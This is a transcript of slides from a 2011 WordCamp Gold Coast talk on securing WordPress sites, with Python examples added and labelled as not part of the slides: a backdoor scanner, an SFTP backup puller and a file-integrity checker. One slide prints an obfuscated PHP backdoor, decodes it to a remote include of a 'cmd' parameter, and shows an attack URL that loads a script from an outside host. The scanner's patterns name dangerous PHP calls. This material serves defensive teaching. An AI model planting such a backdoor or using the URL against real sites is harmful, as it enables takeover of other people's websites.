Securing Your WordPress Website - WordCamp GC 2011


Presentation slides from Vladimir Lasky's talk on how to harden your WordPress website against would-be attackers and avoid inadvertently creating security holes.

Contains various tips and recommendations for off-the-shelf plugins to mitigate common security threats.

Presented on Sunday 6th November at WordCamp Gold Coast 2011.

    Presentation Transcript

    • Securing Your WordPress Website Vladimir Lasky http://wpexpert.com.au/ WordCamp GC 2011
    • For the Impatient, Lazy and Easily Distracted
      • Rename your admin account
      • Only download plugins and themes hosted on WordPress.org and regularly update them
      • Change your database table prefix from “wp_” to something random using “WordPress Table Rename” plugin
      • Install the plugin “Semisecure Login Reimagined”
    • Does This Describe You?
      • Seldom update your WordPress installation & plugins
      • Seldom backup your WordPress installation & plugins
      • Access your WordPress site over public computers and/or Wi-Fi networks
      • Use the same password on multiple websites
      • Download themes and plugins from third-party sites or file sharing networks
      • Rely on cheap developers found through online freelance websites
      • You may be at risk!
    • How We Achieve Security
      • The only perfect security is to not have a website - Anything else is relative
      • Our goals:
        • Make the attacker pick on a weaker target
        • Avoid creating a security hole ourselves
      • Our plan:
        • To use off-the-shelf WordPress plugins where possible and avoid doing anything to break compatibility with other plugins or complicate day-to-day activities
    • The Three Pillars of Security: Prevention, Detection, Recovery
    • Know Your Enemy
      • Cyber Criminals
      • Cheap Thrill Seekers AKA “Script Kiddies”
      • Business Rivals
      • Disgruntled Employees
      • Ideological Enemies
    • What Do Attackers Want to Achieve?
      • Cheap thrills
      • Material for identity theft
      • Damage reputation of a business
      • Disrupt e-Commerce
      • To create a "Botnet" – a staging point for attacks against a third party.
      • Obtaining restricted information
      • Black-hat SEO (usually backlink generation)
    • Characterising Security Threats
      • Active/Passive Method
      • The aims of the other party
      • Their knowledge of you
      • Their level of motivation
      • The level of difficulty required
      • What is their alternative option
    • Top Security Threats
      • Brute Force Password Attacks
      • Code Injection Attacks (SQL/PHP and XSS)
      • Denial of Service Attacks
      • Sniffing Network Traffic to Recover Plaintext Passwords and Session Cookies
      • Malicious Code within Themes/Plugins
    • Brute Force Password Attack Example
    • Classic SQL Injection Example
    • Malicious Code Example
      • The following is a line of obfuscated PHP code in a compromised plugin or theme:
        • eval(base64_decode("aWYoaXNzZXQoJF9HRVRbImNtZCJdKSlpbmNsdWRlICRfR0VUWyJjbWQiXTs="));
      • This evaluates as the following PHP statement:
        • if(isset($_GET["cmd"]))include $_GET["cmd"];
      • This allows an attacker to run any PHP script on your site by setting the query parameter ‘cmd’ in the URL:
        • http://www.yoursite.com/index.php?cmd=http://www.somesite.com/somescript.txt
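An added example, not part of the slides: a small stdlib-only Python scanner that finds eval(base64_decode("...")) lines in PHP files, decodes the blob and flags payloads that hand request input straight to include/eval/shell functions, which is what the line above does. The sample plugin file is constructed for the demo and all function names are assumptions of this example.

```python
"""Find eval(base64_decode("...")) lines in PHP files and decode what they hide."""
import base64
import binascii
import re
from pathlib import Path

# eval(base64_decode("...")) with either quote style and optional whitespace
OBFUSCATED_EVAL = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""", re.I)
# Decoded payloads that feed request input into include/eval/shell functions
REMOTE_CONTROL = re.compile(
    r"\b(include|require|include_once|require_once|eval|assert|system|exec|passthru|shell_exec)"
    r"\s*\(?\s*\$_(GET|POST|REQUEST|COOKIE)\b")

def decode_payload(encoded: str):
    """Return the decoded PHP text, or None if the blob is not valid base64."""
    try:
        return base64.b64decode(re.sub(r"\s+", "", encoded)).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def scan_php_source(src: str, name: str = "<input>") -> list:
    """One finding per obfuscated eval; 'backdoor' if the payload reads request input."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for m in OBFUSCATED_EVAL.finditer(line):
            decoded = decode_payload(m.group(2))
            hit = decoded is not None and REMOTE_CONTROL.search(decoded) is not None
            findings.append({"file": name, "line": lineno, "decoded": decoded,
                             "verdict": "backdoor" if hit else "obfuscated"})
    return findings

def scan_tree(root) -> list:
    """Scan every .php file under a WordPress install (plugins, themes, core)."""
    out = []
    for p in Path(root).rglob("*.php"):
        out.extend(scan_php_source(p.read_text("utf-8", "replace"), str(p)))
    return out

# Constructed sample plugin file: the line from the slides plus a harmless obfuscated echo
SAMPLE_PLUGIN = (
    "<?php\n"
    "// Plugin Name: Example Widget\n"
    'eval(base64_decode("aWYoaXNzZXQoJF9HRVRbImNtZCJdKSlpbmNsdWRlICRfR0VUWyJjbWQiXTs="));\n'
    "eval(base64_decode('ZWNobyAnaGknOw=='));\n"
)

if __name__ == "__main__":
    for f in scan_php_source(SAMPLE_PLUGIN, "example-widget.php"):
        print(f"{f['file']}:{f['line']} [{f['verdict']}] {f['decoded']}")
```

Run scan_tree("/path/to/wp-content") on a copy of the site; anything reported as "backdoor" should be quarantined and the plugin or theme reinstalled from WordPress.org.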
    • Good Habits
      • Only obtain free plugins and themes hosted on WordPress.org.
      • Buy premium plugins/themes from the Author's website, which should have their contact details
      • Update your WordPress installation and plugins regularly
      • When travelling, access the Internet from your own smartphone or notebook computer – not from an Internet Cafe
    • Choosing a Password
      • Twelve characters long as a minimum, but not a dictionary word
      • Common number/letter substitutions are not very useful
      • A good mnemonic technique: come up with a memorable sentence, and use the first letters of each word to form the password e.g.
        • “Jack and Jill went up the hill to fetch a pail of water” could form a 13-character password “JaJwuthtfapow”
    • Secure Your Backups
      • Most automated backup plugins operate this way:
        • They archive your database and installation files
        • They upload this archive to a remote site using saved authentication details
      • If your site is compromised, these saved authentication details could be used to destroy your saved backups
      • The solution: Automated Remote Backups
    • Automated Remote Backups
      • Instead:
        • Use the backup plugin ONLY to archive your Database and Installation files and place them in a private folder
        • Configure a remote system to periodically connect to your site via SFTP/FTP and download this backup file.
      • If a hacker compromises your system, they will not be able to destroy your saved backups
      • Good article on implementing this:
        • http://www.makeuseof.com/tag/automated-remote-backup-wordpress/
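An added example of the pull model just described, not code from the slides or the linked article: a Python script that runs on the trusted remote system, fetches the archive from the site's private folder over SFTP with the collector's own SSH key, and keeps only the newest copies. Host, user, paths and function names are assumptions of this example.

```python
"""Pull-model backup collector: runs on a trusted machine that is NOT the web server."""
import subprocess
from datetime import datetime, timezone
from pathlib import Path

def sftp_batch(remote_dir: str, remote_name: str, local_path: str) -> str:
    """Build the sftp batch that fetches the archive from the site's private folder."""
    return f"cd {remote_dir}\nget {remote_name} {local_path}\nbye\n"

def select_expired(names: list, keep: int) -> list:
    """Given timestamp-prefixed archive names, return those older than the newest `keep`."""
    if keep < 1:
        raise ValueError("keep must be at least 1")
    return sorted(names)[:-keep]

def pull_backup(host: str, user: str, remote_dir: str, remote_name: str,
                dest_dir: str, keep: int = 14) -> Path:
    """Download today's archive and prune old ones. The web server never holds a
    credential for this machine, so a compromised site cannot reach the copies."""
    dest = Path(dest_dir)
    dest.mkdir(parents=True, exist_ok=True)
    stamp = datetime.now(timezone.utc).strftime("%Y%m%dT%H%M%SZ")
    local = dest / f"{stamp}-{remote_name}"
    # "-b -" makes OpenSSH sftp read the batch from stdin; key-based auth, no password prompt
    subprocess.run(["sftp", "-b", "-", f"{user}@{host}"],
                   input=sftp_batch(remote_dir, remote_name, str(local)),
                   text=True, check=True)
    present = [p.name for p in dest.iterdir() if p.is_file()]
    for name in select_expired(present, keep):
        (dest / name).unlink()
    return local

if __name__ == "__main__":
    # Assumed values: the site's SFTP account and the private (non-web) folder the plugin writes to
    pull_backup("www.yoursite.com", "backupuser", "/home/backupuser/private-backups",
                "site-backup.tar.gz", "/var/backups/yoursite", keep=14)
```

Schedule it from cron on the collector; the SFTP account on the site should only be able to read the private backup folder.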
    • Plugin: Semisecure Login Reimagined
      • Purpose
        • Encrypts passwords without requiring SSL. Instead, it uses JavaScript to encrypt the password
      • Benefits:
        • Simple installation – just activate
        • Eliminates risk of obtaining password by sniffing network traffic
      • Limitations:
        • All other traffic is unencrypted. WordPress session cookie is still vulnerable
    • Plugin: WordPress HTTPS (SSL)
      • Purpose:
        • All traffic between Web Browser and Blog is encrypted
      • Benefits:
        • Eliminates risk of password sniffing and session hijacking
      • Limitations:
        • Requires a web host with a Shared SSL certificate (HostGator, BlueHost).
        • Alternatively, you must obtain an SSL Certificate in the name of your primary Domain and get your web host to install it.
        • Higher CPU Usage on web server
    • Plugin: Theme Authenticity Checker
      • Purpose:
        • Scans your theme files for presence of code that is likely to be malicious
      • Benefit:
        • Rapidly scans theme files without having to look through code manually
      • Limitations:
        • Does not scan plugins
        • Not guaranteed to find all types of malicious code
    • Plugin: WordPress File Monitor Plus
      • Purpose
        • Periodically checks to see if any files have been added, changed or deleted in your WordPress installation
      • Benefit:
        • Will detect many types of PHP injection attacks and other forms of intrusion
      • Limitations:
        • Will generate false alarms. You may specify folders to be excluded, but then there is a risk that those could be compromised unknowingly
        • Small chance that a very well-targeted attack could inactivate or sabotage the plugin before it raises the alarm
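An added example of the baseline-and-compare technique such a plugin relies on, not the plugin's own code: a stdlib-only Python checker that hashes every file under the install, stores the baseline outside the web root, and reports added, changed and deleted files on later runs. The excluded folders and function names are assumptions of this example.

```python
"""Baseline-and-compare file integrity check for a WordPress tree (stdlib only)."""
import hashlib
import json
from pathlib import Path

DEFAULT_EXCLUDE = ("wp-content/cache", "wp-content/uploads")

def is_excluded(rel: str, exclude=DEFAULT_EXCLUDE) -> bool:
    """True if the relative POSIX path is inside an excluded folder."""
    return any(rel == e or rel.startswith(e + "/") for e in exclude)

def hash_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot(root, exclude=DEFAULT_EXCLUDE) -> dict:
    """Map every file under root to its SHA-256. Excluding folders cuts false alarms,
    but (as the slides warn) anything planted there goes unnoticed."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hash_file(p)
            for p in sorted(root.rglob("*"))
            if p.is_file() and not is_excluded(p.relative_to(root).as_posix(), exclude)}

def diff_snapshots(baseline: dict, current: dict) -> dict:
    """Report what was added, deleted or modified since the baseline was taken."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "deleted": sorted(set(baseline) - set(current)),
        "changed": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
    }

def check(root, baseline_path) -> dict:
    """Compare root against a stored baseline, creating it on first run. Keep the baseline
    outside the web root (ideally on another host) so an intruder cannot rewrite it."""
    baseline_path = Path(baseline_path)
    current = snapshot(root)
    if not baseline_path.exists():
        baseline_path.write_text(json.dumps(current, indent=1))
        return {"added": [], "deleted": [], "changed": [], "note": "baseline created"}
    return diff_snapshots(json.loads(baseline_path.read_text()), current)

if __name__ == "__main__":
    import sys
    report = check(sys.argv[1], sys.argv[2])  # e.g. /var/www/html /root/wp-baseline.json
    for kind in ("added", "changed", "deleted"):
        for rel in report[kind]:
            print(f"{kind.upper():8} {rel}")
```

Re-take the baseline right after a legitimate WordPress or plugin update; any change reported between updates deserves a look.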
    • Plugin: WordPress Firewall 2
      • Purpose
        • Monitors web requests and blocks those that seem suspicious
      • Benefit:
        • Will block majority of SQL and PHP Injection attempts
      • Limitations:
        • Small performance overhead on each request
        • On most aggressive setting, could interfere with some plugins
    • Plugin: Useful 404s
      • Purpose
        • Detects broken links on your website, or broken links on external sites and sends you an email
      • Benefit:
        • As a side effect, it also can detect attempts to compromise your site – namely, where the attacker spoofs the HTTP_REFERER header and attempts to blindly access plugin or theme files that may not exist
      • Limitations:
        • Lots and lots of false alarms
    • Plugin: Email PHP Errors Plugin
      • Purpose
        • Captures PHP error output and can also generate emails with error reports. Helps detect bugs in plugins, themes or problems with the web host
      • Benefit:
        • As a side effect, may detect some types of PHP injection attempts or other attempts to exploit code vulnerabilities
        • People often overlook their error_logs and let them pile up
      • Limitations:
        • Lots of false alarms
    • Plugin: WP-Ban
      • Purpose
        • Ban users by IP, IP Range, host name, user agent and referrer URL from visiting your site
      • Benefit:
        • Useful for blocking repeat attacks by the same party
        • Able to reduce the impact of denial of service (DoS) attacks
      • Limitations:
        • Need to determine details of specific attacker(s)
        • A wise attacker will change their IP addresses frequently
        • Can block innocent people
    • Conclusion
      • WordPress Codex - Hardening WordPress
        • http://codex.wordpress.org/Hardening_WordPress
        • Various tips for site administrators to improve your site security
      • WordPress Codex – Data Validation
        • http://codex.wordpress.org/Data_Validation
        • A must for developers - describes all the facilities available in WordPress to validate data, preventing your code from being vulnerable to code injection exploits
      • Questions and Comments:
        • http://wpexpert.com.au/contact-us/